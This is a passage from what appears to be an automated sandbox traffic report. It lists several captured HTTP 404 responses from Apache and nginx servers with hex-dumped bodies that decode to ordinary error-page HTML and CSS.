20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:56 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:59 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:37:01 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:37:04 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Sep 2024 07:37:24 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Sep 2024 07:37:27 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
